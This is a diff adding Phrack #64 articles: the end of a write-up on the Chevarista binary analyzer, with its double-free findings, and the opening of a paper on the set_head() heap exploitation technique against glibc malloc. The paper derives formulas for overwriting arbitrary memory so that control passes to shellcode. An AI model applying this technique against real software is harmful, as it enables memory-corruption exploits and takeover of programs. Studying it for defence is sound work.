+SPARC IDG : New bloc at addr 0000000000100BD8 
+SPARC IDG : New bloc at addr 0000000000100B94 
+SPARC IDG : New bloc at addr 00000000001008BC 
+SPARC IDG : New bloc at addr 00000000001008D0 
+SPARC IDG : New bloc at addr 0000000000100BA0 
+SPARC IDG : New bloc at addr 0000000000100B34 
+SPARC IDG : New bloc at addr 0000000000100B58 
+Cflow reference to : 00100B74 
+Cflow reference from : 00100B6C 
+Cflow reference from : 00100B2C 
+Cflow reference from : 00100B50 
+SPARC IDG : New bloc at addr 0000000000100B04 
+SPARC IDG : New bloc at addr 00000000002010E0 
+SPARC IDG : New bloc at addr 0000000000100AE8 
+SPARC IDG : New bloc at addr 0000000000100A98 
+Intraprocedural Dependance Graph has been built succesfully! 
+A number of 47 blocs has been statically traced for flow-types
+[+] IDG built
+
+Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
+Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
+Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
+Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
+Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
+Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100A48 
+Return-Value REPLACED with name = %i0 (addr= 0000000000100A44) 
+Backward dataflow analysis VAR        %i0, instr addr 0000000000100A44 
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100A5C 
+Return-Value REPLACED with name = %i0 (addr= 0000000000100A58) 
+Backward dataflow analysis VAR        %i0, instr addr 0000000000100A58 
+Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100A6C 
+Scalar parameter REPLACED with name = %o0 (addr= 0000000000201084)
+Backward dataflow analysis VAR        %o0, instr addr 0000000000201084 
+Scalar parameter REPLACED with name = %o0 (addr= 0000000000201084)
+Backward dataflow analysis VAR        %o0, instr addr 0000000000201084 
+Scalar parameter REPLACED with name = %o1 (addr= 0000000000201084)
+Backward dataflow analysis VAR        %o1, instr addr 0000000000201084 
+Scalar parameter REPLACED with name = %o1 (addr= 0000000000201084)
+Backward dataflow analysis VAR        %o1, instr addr 0000000000201084 
+Scalar parameter REPLACED with name = %o2 (addr= 0000000000201084)
+Backward dataflow analysis VAR        %o2, instr addr 0000000000201084 
+Scalar parameter REPLACED with name = %o2 (addr= 0000000000201084)
+Backward dataflow analysis VAR        %o2, instr addr 0000000000201084 
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100A84 
+Return-Value REPLACED with name = %i0 (addr= 0000000000100A80) 
+Backward dataflow analysis VAR        %i0, instr addr 0000000000100A80 
+Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100AA4 
+Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100ABC 
+Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100AAC 
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100AD4 
+Return-Value REPLACED with name = %i0 (addr= 0000000000100AD0) 
+Backward dataflow analysis VAR        %i0, instr addr 0000000000100AD0 
+Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100AF4 
+Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100B24 
+Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100B18 
+Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
+Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
+Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
+Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B38 
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
+Scalar parameter REPLACED with name = %o0 (addr= 0000000000100958)
+Backward dataflow analysis VAR        %o0, instr addr 0000000000100958 
+Scalar parameter REPLACED with name = %o0 (addr= 0000000000100958)
+[....]
+Backward dataflow analysis VAR        %fp, instr addr 0000000000100B6C 
+Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100B60 
+Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B58 
+[+] GateVisitor finished
+
+[+] AliasVisitor finished
+
++ Entered Node Splitting for Node id 24 
++ Entered Node Splitting for Node id 194 
++ Entered Node Splitting for Node id 722 
++ Entered Node Splitting for Node id 794 
++ Entered Node Splitting for Node id 1514 
++ Entered Node Splitting for Node id 1536 
++ Entered Node Splitting for Node id 1642 
+[+] SymbolicVisitor finished
+
+Entering DotVisitor
++ SESE visited
++ SESE visited
+* SESE already visited
+* SESE already visited
++ SESE visited
++ SESE visited
+* SESE already visited
+* SESE already visited
+* SESE already visited
+! Node pointed by (nil) is NOT a SESE
++ SESE visited
+* SESE already visited
+* SESE already visited
+* SESE already visited
+[+] Print*Visitors finished
+
+Starting HeapVisitor
+Double Free found
+Double Free found
+Double malloc
+[+] Heap visitor finished
+
+[+] Chevarista has finished
+
+
+    The run was performed in less than 2 seconds and multiple vulnerabilities have
+    been found in the binary file (2 double free and one memory leak as indicated
+    by the latest output). Its pretty useless without more information, which brings
+    us to the results.
+
+
+
+-------------------------[ D. Vulnerable paths extraction
+
+
+
+
+      Once the analysis has been performed, we can simply check what the vulnerable
+      paths were:
+
+      ~/IDA/sdk/plugins/chevarista/src $ ls tmp/
+ 
+      cflow.png  chevarista.alias  chevarista.buchi  chevarista.dflow.dot  \
+      chevarista.dot  chevarista.gate  chevarista.heap  chevarista.lir     \
+      chevarista.symbolic  dflow.png
+
+
+      Each visitor (transformation) outputs the complete program in each intermediate
+      form. The most interesting thing is the output of the heap visitor that give
+      us exactly the vulnerable paths:
+
+      ~/IDA/sdk/plugins/chevarista/src $ cat tmp/chevarista.heap 
+
+      [%fp + 7e7]
+
+      [%fp + 7df]
+
+      [%l0]
+
+      ***********************************
+      *                                 *
+      * Multiple free of same variables *
+      *                                 *
+      ***********************************
+
+      ******************
+      path to free : 1
+      ******************
+      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
+      @0x100a44 (4) {S} 46: %g1 = outparam_%o0                    
+      @0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1                 
+      @0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7      
+      @0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0       
+      @0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f      
+      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     
+
+      ******************
+      path to free : 2
+      ******************
+      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
+      @0x100a44 (4) {S} 46: %g1 = outparam_%o0                    
+      @0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1                 
+      @0x100b58 (8) {S} 2090: %g1 = local_%fp$0x7e7               
+      @0x100b5c (8) {S} 2104: local_%fp$0x7d7 = %g1               
+      @0x100b68 (8) {S} 2146: %g1 = local_%fp$0x7d7               
+      @0x100b6c (8) {S} 2160: local_%fp$0x7df = %g1               
+      @0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df      
+      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     
+
+      ******************
+      path to free : 3
+      ******************
+      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
+      @0x100a58 (4) {S} 96: %g1 = outparam_%o0                    
+      @0x100a5c (8) {S} 110: local_%fp$0x7df = %g1                
+      @0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df      
+      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     
+
+      ******************
+      path to free : 4
+      ******************
+      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
+      @0x100a58 (4) {S} 96: %g1 = outparam_%o0                    
+      @0x100a5c (8) {S} 110: local_%fp$0x7df = %g1                
+      @0x100b60 (8) {S} 2118: %g1 = local_%fp$0x7df               
+      @0x100b64 (8) {S} 2132: local_%fp$0x7e7 = %g1               
+      @0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7      
+      @0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0       
+      @0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f      
+      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     
+      
+      ~/IDA/sdk/plugins/chevarista/src $ 
+      
+
+As you can see, we now have the complete vulnerable paths where multiple
+frees are done in sequence over the same variables. In this example, 2
+double frees were found and one memory leak, for which the path to free
+is not given, since there is no (its a memory leak :).
+
+A very useful trick was also to give more refined types to operands. For
+instance, local variables can be identified pretty easily if they are
+accessed throught the stack pointer. Function parameters and results
+can also be found easily by inspecting the use of %i and %o registers
+(for the SPARC architecture only).
+
+
+
+
+----------------[ E. Future work : Refinement
+
+
+
+	
+	The final step of the analysis is refinement [CEGF]. Once you have analyzed
+   a program for vulnerabilities and we have extracted the path of the program
+   that looks like leading to a corruption, we need to recreate the real conditions
+   of triggering the bug in the reality, and not in an abstract description of the
+   program, as we did in that article. For this, we need to execute for real (this
+   time) the program, and try to feed it with data that are deduced from the 
+   conditional predicates that are on the abstract path of the program that leads to
+   the potential vulnerability. The input values that we would give to the program
+   must pass all the tests that are on the way of reaching the bug in the real world.
+
+   Not a lot of projects use this technique. It is quite recent research to determine
+   exactly how to be the most precise and still scaling to very big programs. The
+   answer is that the precision can be requested on demand, using an iterative procedure
+   as done in the BLAST [BMC] model checker. Even advanced abstract interpretation
+   framework [ASA] do not have refinement in their framework yet : some would argue
+   its too computationally expensive to refine abstractions and its better to couple
+   weaker abstractions together than tring to refine a single "perfect" one.
+
+
+
+ 
+
+---------------[ V. Related Work
+
+
+
+	Almost no project about this topic has been initiated by the underground. The
+	work of Nergal on finding integer overflow into Win32 binaries is the first
+	notable attempt to mix research knowledge and reverse engineering knowledge,
+	using a decompiler and a model checker. The work from Halvar Flake in the framework 
+	of BinDiff/BinNavi [BN] is interesting but serves until now a different purpose than 
+	finding vulnerabilities in binary code.
+
+	On a more theoretical point of view, the interested reader is invited to look
+	at the reference for findings a lot of major readings in the field of program
+	analysis. Automated reverse engineering, or decompiling, has been studied in
+	the last 10 years only and the gap is still not completely filled between those
+	2 worlds. This article tried to go into that direction by introducing formal
+	techniques using a completely informal view.
+
+	Mostly 2 different theories can be studied : Model Checking [MC] and Abstract 
+	Interpretation [AI] . Model Checking generally involves temporal logic properties
+	expressed in languages such as LTL, CTL, or CTL* or [TL]. Those properties are then
+	translated to automata. Traces are then used as words and having the automata
+	not recognizing a given trace will mean breaking a property. In practice, the
+	formula is negated, so that the resulting automata will only recognize the trace
+	leading to vulnerabilities, which sounds a more natural approach for detecting
+	vulnerabilities. 
+
+	Abstract interpretation [ASA] is about finding the most adequate system representation 
+	for allowing the checking to be computable in a reasonable time (else we might 
+	end up doing an "exhaustive bruteforce checking" if we try to check all the potential
+ 	behavior of the program, which can btw be infinite). By reasoning into an abstract
+	domain, we make the state-space to be finite (or at least reduced, compared to the 
+	real state space) which turn our analysis to be tractable. The strongest the
+	abstractions are, the fastest and imprecise our analysis will be. All the job
+	consist in finding the best (when possible) or an approximative abstraction that
+	is precise enough and strong enough to give results in seconds or minuts.
+
+	In this article, we have presented some abstractions without quoting them explicitely
+	(interval abstraction, trace abstraction, predicate abstraction ..). You can also
+	design product domains, where multiple abstractions are considered at the same time,
+	which gives the best results, but for which automated procedures requires more work
+	to be defined.
+
+
+------[ VI. Conclusion
+
+
+	I Hope to have encouraged the underground community to think about using more
+	formal techniques for the discovery of bugs in programs. I do not include this
+	dream automated tool, but a simplier one that shows this approach as rewarding,
+	and I look forward seing more automated tools from the reverse engineering 
+	community in the future. The chevarista analyzer will not be continued as it, 
+	but is being reimplemented into a different analysis environment, on top of a
+	dedicated language for reverse engineering and decompilation of machine code.
+	Feel free to hack inside the code, you dont have to send me patches as I do not
+	use this tool anymore for my own vulnerability auditing. I do not wish to encourage
+	script kiddies into using such tools, as they will not know how to exploit the
+	results anyway (no, this does not give you a root shell).
+
+
+------[ VII. Greetings
+
+	
+	Why should every single Phrack article have greetings ? 
+
+	The persons who enjoyed Chevarista know who they are.
+
+
+------[ VIII. References
+
+
+ [TVLA] Three-Valued Logic
+	http://en.wikipedia.org/wiki/Ternary_logic
+  
+ [AI] Abstract Interpretation
+      http://www.di.ens.fr/~cousot/
+
+ [MC] Model Checking
+      http://en.wikipedia.org/wiki/Model_checking
+
+ [CEGF] Counterexample-guided abstraction refinement 
+        E Clarke - Temporal Representation and Reasoning
+
+ [BN] Sabre-security BinDiff & BinNavi
+      http://www.sabre-security.com/
+
+ [JPF] NASA JavaPathFinder
+       http://javapathfinder.sourceforge.net/
+
+ [UNG] UQBT-ng : a tool that finds integer overflow in Win32 binaries
+	events.ccc.de
+
+ [SSA] Efficiently computing static single assignment form
+       R Cytron, J Ferrante, BK Rosen, MN Wegman
+       ACM Transactions on Programming Languages and SystemsFK 
+ 
+ [SSI] Static Single Information (SSI)
+       CS Ananian - 1999 - lcs.mit.edu       
+
+ [MCI] Modern Compiler Implementation (Book)
+       Andrew Appel
+ 
+ [BMC] The BLAST Model Checker
+       http://mtc.epfl.ch/software-tools/blast/
+
+ [AD] 22C3 - Autodafe : an act of software torture
+      events.ccc.de/congress/2005/fahrplan/events/606.en.html
+
+ [TL] Linear Temporal logic
+      http://en.wikipedia.org/wiki/Linear_Temporal_Logic
+
+ [ASA] The ASTREE static analyzer
+       www.astree.ens.fr
+
+ [DLB] Dvorak LKML select bug
+       Somewhere lost on lkml.org
+
+ [RSI] ERESI (Reverse Engineering Software Interface)
+       http://eresi.asgardlabs.org
+
+ [PA] Automatic Predicate Abstraction of C Programs
+      T Ball, R Majumdar, T Millstein, SK Rajamani 
+      ACM SIGPLAN Notices 2001
+
+ [IRM] INTEL reference manual
+       http://www.intel.com/design/pentium4/documentation.htm
+
+ [SRM] SPARC reference manual
+       http://www.sparc.org/standards/
+
+ [LAT] Wikipedia : lattice
+       http://en.wikipedia.org/wiki/Lattice_%28order%29
+ 
+ [DDA] Data Dependence Analysis of Assembly Code
+       ftp://ftp.inria.fr/INRIA/publication/publi-pdf/RR/RR-3764.pdf
+
+ [DP] Design Patterns : Elements of Reusable Object-Oriented Software
+      Erich Gamma, Richard Helm, Ralph Johnson & John Vlissides
+      
+
+
+------[ IX. The code    
+
+Feel free to contact me for getting the code. It is not included
+in that article but I will provide it on request if you show
+an interest. 
\ No newline at end of file
diff --git a/phrack64/9.txt b/phrack64/9.txt
new file mode 100644
index 0000000..daa3812
--- /dev/null
+++ b/phrack64/9.txt
@@ -0,0 +1,2350 @@
+            _                                                    _
+          _/B\_                                                _/W\_
+          (* *)                Phrack #64 file 9               (* *)
+          | - |                                                | - |
+          |   |  The use of set_head to defeat the wilderness  |   |
+          |   |                                                |   |
+          |   |                    By g463                     |   |
+          |   |                                                |   |
+          |   |          jean-sebastien@guay-leroux.com        |   |
+          (________________________________________________________)
+
+
+1 - Introduction
+
+2 - The set_head() technique
+  2.1 - A look at the past - "The House of Force" technique
+  2.2 - The basics of set_head()
+  2.3 - The details of set_head()
+
+3 - Automation
+  3.1 - Define the basic properties
+  3.2 - Extract the formulas
+  3.3 - Compute the values
+
+4 - Limitations
+  4.1 - Requirements of two different techniques
+      4.1.1 - The set_head() technique
+      4.1.2 - The "House of Force" technique
+  4.2 - Almost 4 bytes to almost anywhere technique
+      4.2.1 - Everything in life is a multiple of 8
+      4.2.2 - Top chunk's size needs to be bigger than the requested malloc
+              size
+      4.2.3 - Logical OR with PREV_INUSE
+
+5 - Taking set_head() to the next level
+  5.1 - Multiple overwrites
+  5.2 - Infoleak
+
+6 - Examples
+  6.1 - The basic scenarios
+      6.1.1.1 - The most basic form of the set_head() technique
+      6.1.1.2 - Exploit
+      6.1.2.1 - Multiple overwrites
+      6.1.2.2 - Exploit
+  6.2 - A real case scenario: file(1) utility
+      6.2.1 - The hole
+      6.2.2 - All the pieces fall into place
+      6.2.3 - hanuman.c
+
+7 - Final words
+
+8 - References
+
+
+--[ 1 - Introduction
+
+Many papers have been published in the past describing techniques on how to
+take advantage of the inbound memory management in the GNU C Library
+implementation.  A first technique was introduced by Solar Designer in his
+security advisory on a flaw in the Netscape browser[1].  Since then, many
+improvements have been made by many different individuals ([2], [3], [4],
+[5], [6] just to name a few).  However, there is always one situation that
+gives a lot more trouble than others.  Anyone who has already tried to take
+advantage of that situation will agree. How to take control of a vulnerable
+program when the only critical information that you can overwrite is the
+header of the wilderness chunk?
+
+The set_head technique is a new way to obtain a "write almost 4 arbitrary
+bytes to almost anywhere" primitive. It was born because of a bug in the
+file(1) utility that the author was unable to exploit with existing
+techniques.
+
+This paper will present the details of the technique.  Also, it will show
+you how to practically apply this technique to other exploits.  The
+limitations of the technique will also be presented.  Finally, some
+examples will be shown to better understand the various aspects of the
+technique.
+
+
+--[ 2 - The set_head() technique
+
+Most of the time, people who write exploits using malloc techniques are not
+aware of the difficulties that the wilderness chunk implies until they face
+the problem.  It is only at this exact time that they realize how the known
+techniques (i.e. unlink, etc.) have no effect on this particular context.
+
+As MaXX once said [3]: "The wilderness chunk is one of the most dangerous
+opponents of the attacker who tries to exploit heap mismanagement. Because
+this chunk of memory is handled specially by the dlmalloc internal
+routines, the attacker will rarely be able to execute arbitrary code if
+they solely corrupt the boundary tag associated with the wilderness chunk."
+
+
+----[ 2.1 - A look at the past - "The House of Force" technique
+
+To better understand the details of the set_head() technique explained in
+this paper, it would be helpful to first understand what has already been
+done on the subject of exploiting the top chunk.
+
+This is not the first time that the exploitation of the wilderness chunk
+has been specifically targeted.  The pioneer of this type of exploitation
+is Phantasmal Phantasmagoria.
+
+He first wrote an article entitled "Exploiting the wilderness" about it in
+2004.  Details of this technique are out of scope for the current paper,
+but you can learn more about it by reading his paper [5].
+
+He gave a second try at exploiting the wilderness in his excellent paper
+"Malloc Maleficarum" [4].  He named his technique "The House of Force".  To
+better understand the set_head() technique, the "House of Force" is
+described below.
+
+The idea behind "The House of Force" is quite simple but there are specific
+steps that need to be followed.  Below, you will find a brief summary of
+all the steps.
+
+
+Step one:
+
+The first step in the "House of Force" consists in overflowing the size
+field of the top chunk to make the malloc library think it is bigger than
+it actually is.  The preferred new size of the top chunk should be
+0xffffffff.  Below is a an ascii graphic of the memory layout at the time
+of the overflow.  Notice that the location of the top chunk is somewhere in
+the heap.
+
+
+                0xbfffffff  -> +-----------------+
+                               |                 |
+                               |     stack       |
+                               |                 |
+                               :                 :
+                               :                 :
+                               .                 .
+                               :                 :
+                               :                 :
+                               |                 |
+                               |                 |
+                               |      heap       |<--- Top chunk
+                               |                 |
+                               +-----------------+
+                               |  global offset  |
+                               |      table      |
+                               +-----------------+
+                               |                 |
+                               |                 |
+                               |      text       |
+                               |                 |
+                               |                 |
+                0x08048000  -> +-----------------+
+
+
+Step two:
+
+After this, a call to malloc with a user-supplied size should be issued.
+With this call, the top chunk will be split in two parts.  One part will be
+returned to the user, and the other part will be the remainder chunk (the
+top chunk).
+
+The purpose of this step is to move the top chunk right before a global
+offset table entry.  The new location of the top chunk is the sum of the
+current address of the top chunk and the value of the malloc call.  This
+sum is done with the following line of code:
+
+        --[ From malloc.c
+
+        remainder = chunk_at_offset(victim, nb);
+
+After the malloc call, the memory layout should be similar to the
+representation below:
+
+
+                0xbfffffff  -> +-----------------+
+                               |                 |
+                               |     stack       |
+                               |                 |
+                               :                 :
+                               :                 :
+                               .                 .
+                               :                 :
+                               :                 :
+                               |                 |
+                               |                 |
+                               |      heap       |
+                               |                 |
+                               +-----------------+
+                               |  global offset  |
+                               |      table      |
+                               +-----------------+<--- Top chunk
+                               |                 |
+                               |                 |
+                               |      text       |
+                               |                 |
+                               |                 |
+                0x08048000  -> +-----------------+
+
+
+Step three:
+
+Finally, another call to malloc needs to be done.  This one needs to be
+large enough to trigger the top chunk code.  If the user has some sort of
+control over the content of this buffer, he can then overwrite entries
+inside the global offset table and he can seize control of the process.
+Look at the following representation for the current memory layout at the
+time of the allocation:
+
+
+                0xbfffffff  -> +-----------------+
+                               |                 |
+                               |     stack       |
+                               |                 |
+                               :                 :
+                               :                 :
+                               .                 .
+                               :                 :
+                               :                 :
+                               |                 |
+                               |                 |
+                               |      heap       |<---- Top chunk
+                               |                 |---+
+                               +-----------------+   |
+                               |  global offset  |   |- Allocated memory
+                               |      table      |   |
+                               +-----------------+---+
+                               |                 |
+                               |                 |
+                               |      text       |
+                               |                 |
+                               |                 |
+                0x08048000  -> +-----------------+
+
+
+----[ 2.2 - The basics of set_head()
+
+Now that the basic review of the "House of Force" technique is done, let's
+look at the set_head() technique.  The basic idea behind this technique is
+to use the set_head() macro to write almost four arbitrary bytes to almost
+anywhere in memory.  This macro is normally used to set the value of the
+size field of a memory chunk to a specific value.  Let's have a peak at the
+code:
+
+        --[ From malloc.c:
+
+        /* Set size/use field */
+        #define set_head(p, s)       ((p)->size = (s))
+
+
+This line is very simple to understand.  It takes the memory chunk 'p',
+modifies its size field and replace it with the value of the variable 's'.
+If the attacker has control of those two parameters, it may be possible to
+modify the content of an arbitrary memory location with a value that he
+controls.
+
+To trigger the particular call to set_head() that could lead to this
+arbitrary overwrite, two specific steps need to be followed.  These steps
+are described below.
+
+
+First step:
+
+The first step of the set_head() technique consists in overflowing the size
+field of the top chunk to make the malloc library think it is bigger than
+it actually is.  The specific value that you will overwrite with will
+depend on the parameters of the exploitable situation.  Below is an ascii
+graphic of the memory layout at the time of the overflow.  Notice that the
+location of the top chunk is somewhere in the heap.
+
+
+                0xbfffffff  -> +-----------------+
+                               |                 |
+                               |      stack      |
+                               |                 |
+                               :                 :
+                               :                 :
+                               .                 .
+                               :                 :
+                               :                 :
+                               |                 |
+                               |                 |
+                               |      heap       |<--- Top chunk
+                               |                 |
+                               +-----------------+
+                               |                 |
+                               |      data       |
+                               |                 |
+                               +-----------------+
+                               |                 |
+                               |                 |
+                               |      text       |
+                               |                 |
+                               |                 |
+                0x08048000  -> +-----------------+
+
+
+Second step:
+
+After this, a call to malloc with a user-supplied size should be issued.
+With this call, the top chunk will be split in two parts.  One part will be
+returned to the user, and the other part will be the remainder chunk (the
+top chunk).
+
+The purpose of this step is to move the top chunk before the location that
+you want to overwrite.  This location needs to be on the stack, and you
+will see why at section 4.2.2.  During this step, the malloc code will set
+the size of the new top chunk with the set_head() macro.  Look at the
+representation below to better understand the memory layout at the time of
+the overwrite:
+
+
+                0xbfffffff  -> +-----------------+
+                               |                 |
+                               |      stack      |
+                               |                 |
+                               +-----------------+
+                               | size of topchunk|
+                               +-----------------+
+                               |prev_size not use|
+                               +-----------------+<--- Top chunk
+                               |                 |
+                               :                 :
+                               :                 :
+                               .                 .
+                               :                 :
+                               :                 :
+                               |                 |
+                               |                 |
+                               |      heap       |
+                               |                 |
+                               +-----------------+
+                               |                 |
+                               |      data       |
+                               |                 |
+                               +-----------------+
+                               |                 |
+                               |                 |
+                               |      text       |
+                               |                 |
+                               |                 |
+                0x08048000  -> +-----------------+
+
+
+If you control the new location of the top chunk and the new size of the
+top chunk, you can get a "write almost 4 arbitrary bytes to almost
+anywhere" primitive.
+
+
+----[ 2.3 - The details of set_head()
+
+The set_head macro is used many times in the malloc library.  However, it's
+used at a particularly interesting emplacement where it's possible to
+influence its parameters.  This influence will let the attacker overwrite 4
+bytes in memory with a value that he can control.
+
+When there is a call to malloc, different methods are tried to allocate the
+requested memory.  MaXX did a pretty great job at explaining the malloc
+algorithm in section 3.5.1 of his text[3].  Reading his text is highly
+suggested before continuing with this text.  Here are the main points of
+the algorithm:
+
+        1. Try to find a chunk in the bin corresponding to the size of the
+           request;
+
+        2. Try to use the remainder chunk;
+
+        3. Try to find a chunk in the regular bins.
+
+
+If those three steps fail, interesting things happen.  The malloc function
+tries to split the top chunk.  The 'use_top' code portion is then called.
+It's in that portion of code that it's possible to take advantage of a call
+to set_head().  Let's analyze the use_top code:
+
+--[ From malloc.c
+
+01 Void_t*
+02 _int_malloc(mstate av, size_t bytes)
+03 {
+04   INTERNAL_SIZE_T nb;               /* normalized request size */
+05
+06   mchunkptr       victim;           /* inspected/selected chunk */
+07   INTERNAL_SIZE_T size;             /* its size */
+08
+09   mchunkptr       remainder;        /* remainder from a split */
+10   unsigned long   remainder_size;   /* its size */
+11
+12
+13   checked_request2size(bytes, nb);
+14
+15 [ ... ]
+16
+17     use_top:
+18
+19     victim = av->top;
+20     size = chunksize(victim);
+21
+22     if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
+23       remainder_size = size - nb;
+24       remainder = chunk_at_offset(victim, nb);
+25       av->top = remainder;
+26       set_head(victim, nb | PREV_INUSE |
+27                (av != &main_arena ? NON_MAIN_ARENA : 0));
+28       set_head(remainder, remainder_size | PREV_INUSE);
+29
+30       check_malloced_chunk(av, victim, nb);
+31       return chunk2mem(victim);
+32     }
+
+
+All the magic happens at line 28.  By forcing a particular context inside
+the application, it's possible to control set_head's parameters and then
+overwrite almost any memory addresses with almost four arbitrary bytes.
+
+Let's see how it's possible to control these two parameters, which are
+'remainder' and 'remainder_size' :
+
+
+        1. How to get control of 'remainder_size':
+
+           a. At line 13, 'nb' is filled with the normalized size of the
+              value of the malloc call.  The attacker should have control
+              on the value of this malloc call.
+
+           b. Remember that this technique requires that the size field of
+              the top chunk needs to be overwritten by the overflow.  At
+              line 19 & 20, the value of the overwritten size field of the
+              top chunk is getting loaded in 'size'.
+
+           c. At line 22, a check is done to ensure that the top chunk is
+              large enough to take care of the malloc request.  The
+              attacker needs that this condition evaluates to true to reach
+              the set_head() macro at line 28.
+
+           d. At line 23, the requested size of the malloc call is
+              subtracted from the size of the top chunk.  The remaining
+              value is then stored in 'remainder_size'.
+
+
+        2. How to get control of 'remainder':
+
+           a. At line 13, 'nb' is filled with the normalized size of the
+              value of the malloc call.  The attacker should have control
+              of the value of this malloc call.
+
+           b. Then, at line 19, the variable 'victim' gets filled with the
+              address of the top chunk.
+
+           c. After this, at line 24, chunk_at_offset() is called.  This
+              macro adds the content of 'nb' to the value of 'victim'.  The
+              result will be stored in 'remainder'.
+
+
+Finally, at line 28, the set_head() macro modifies the size field of the
+fake remainder chunk and fills it with the content of the variable
+'remainder_size'.  This is how you get your "write almost 4 arbitrary bytes
+to almost anywhere in memory" primitive.
+
+
+--[ 3 - Automation
+
+It was explained in section 2.3 that the variables 'remainder' and
+'remainder_size' will be used as parameters to the set_head macro.  The
+following steps will explain how to proceed in order to get the desired
+value in those two variables.
+
+
+----[ 3.1 - Define the basic properties
+
+Before trying to exploit a security hole with the set_head technique, the
+attacker needs to define the parameters of the vulnerable context.  These
+parameters are:
+
+        1. The return location:  This is the location in memory that you
+           want to write to.  It is often referred as 'retloc' through this
+           paper.
+
+        2. The return address: This is the content that you will write to
+           your return location.  Normally, this will be a memory address
+           that points to your shellcode.  It is often referred as 'retadr'
+           through this paper.
+
+        3. The location of the topchunk: To use this technique, you must
+           know the exact position of the top chunk in memory.  This
+           location is often referred as 'toploc' through this paper.
+
+
+----[ 3.2 - Extract the formulas
+
+The attacker has control on two things during the exploitation stage.
+First, the content of the overwritten top chunk's size field and secondly,
+the size parameter to the malloc call.  The values that the attacker
+chooses for these will determine the exact content of the variables
+'remainder' and 'remainder_size' later used by the set_head() macro.
+
+Below, two formulas are presented to help the attacker find the appropriate
+values.
+
+
+        1. How to get the value for the malloc parameter:
+
+           a. The following line is taken directly from the malloc.c code:
+
+              remainder = chunk_at_offset(victim, nb)
+
+           b. 'nb' is the normalized value of the malloc call.  It's the
+              result of the macro request2size().  To make things simpler,
+              let's add 8 to this value to take care of this macro:
+
+              remainder = chunk_at_offset(victim, nb + 8)
+
+           c. chunk_at_offset() adds the normalized size 'nb' to the top
+              chunk's location:
+
+              remainder = toploc + (nb + 8)
+
+           e. 'remainder' is the return location (i.e. 'retloc') and 'nb'
+              is the malloc size (i.e. 'malloc_size'):
+
+              retloc = toploc + (malloc_size + 8)
+
+           d. Isolate the 'malloc_size' variable to get the final formula:
+
+              malloc_size = (retloc - toploc - 8)
+
+
+        2. The second formula is how to get the new size of the top chunk.
+
+           a. The following line is taken directly from the malloc.c code:
+
+              remainder_size = size - nb;
+
+           b. 'size' is the size of the top chunk (i.e. 'topchunk_size'),
+              and 'nb' is the normalized parameter of the malloc call
+              (i.e. 'malloc_size'):
+
+              remainder_size = topchunk_size - malloc_size
+
+           c. 'remainder_size' is in fact the return address
+              (i.e. retadr'):
+
+              retadr = topchunk_size - malloc_size
+
+           d. Isolate 'topchunk_size' to get the final formula:
+
+              topchunk_size = retadr + malloc_size
+
+           e. topchunk_size will get its three least significant bits
+              cleared by the macro chunksize().  Let's consider this in the
+              formula by adding 8 to the right side of the equation:
+
+              topchunk_size = (retadr + malloc_size + 8)
+
+           g. Take into consideration that the PREV_INUSE flag is being set
+              in the set_head() macro:
+
+              topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE
+
+
+----[ 3.3 - Compute the values
+
+You now have the two basic formulas:
+
+        1. malloc_size = (retloc - toploc - 8)
+
+        2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE
+
+You can now proceed with finding the exact values that you will plug into
+your exploit.
+
+To facilitate the integration of those formulas in your exploit code, you
+can use the set_head_compute() function found in the file(1) utility
+exploit code (refer to section 6.2.3).  Here is the prototype of the
+function:
+
+        struct sethead * set_head_compute
+            (unsigned int retloc, unsigned int retadr, unsigned int toploc)
+
+
+The structure returned by the function set_head_compute() is defined this
+way:
+
+        struct sethead {
+            unsigned long topchunk_size;
+            unsigned long malloc_size;
+        }
+
+
